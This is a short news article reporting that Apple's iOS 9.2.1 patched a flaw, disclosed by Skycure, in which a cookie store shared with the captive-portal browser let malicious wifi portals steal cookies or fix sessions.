Apple has patched a flaw in their mobile iOS operating system that made it possible for hackers to impersonate device owners who connect to websites that use encrypted authentication cookies.
The vulnerability stems from a cookie store iOS shared between the default Safari browser and a separate embedded browser used to negotiate “captive portals” that are displayed by many public wifi networks upon the devices initial connection. Captive Portals are webpages that appear when you connect to a new network for the first time, such as connecting at a local cafe like Starbucks or at a hotel, you must first agree to their terms of service before your able to access any other content on the network.
The shared resource made it possible for hackers to develop maliciously-crafted webpages with evil captive portals and associate it with a wifi network, according to a blog post published by the Israeli security firm Skycure. Meaning when a vulnerable iPhone or iPad connect, the network could potentially steal any HTTP cookies stored on the device. Skycure researchers explained:
This issue allows an attacker to:
- Steal users’ (HTTP) cookies associated with a site of the attacker’s choice. By doing so, the attacker can then impersonate the victim’s identity on the chosen site.
- Perform a session fixation attack, logging the user into an account controlled by the attacker–because of the shared Cookie Store, when the victims browse to the affected website via Mobile Safari, they will be logged into the attacker’s account instead of their own.
What’s most shocking about this story is that Skycure researchers privately reported this iOS vulnerability to Apple back in June of 2013. Come 2 and half years later and Apple’s iOS 9.2.1 just patched the cookie flaw. The recent update provides an isolated cookie store to deal with captive portals. Apple said that there are no reports of exploits in the wild.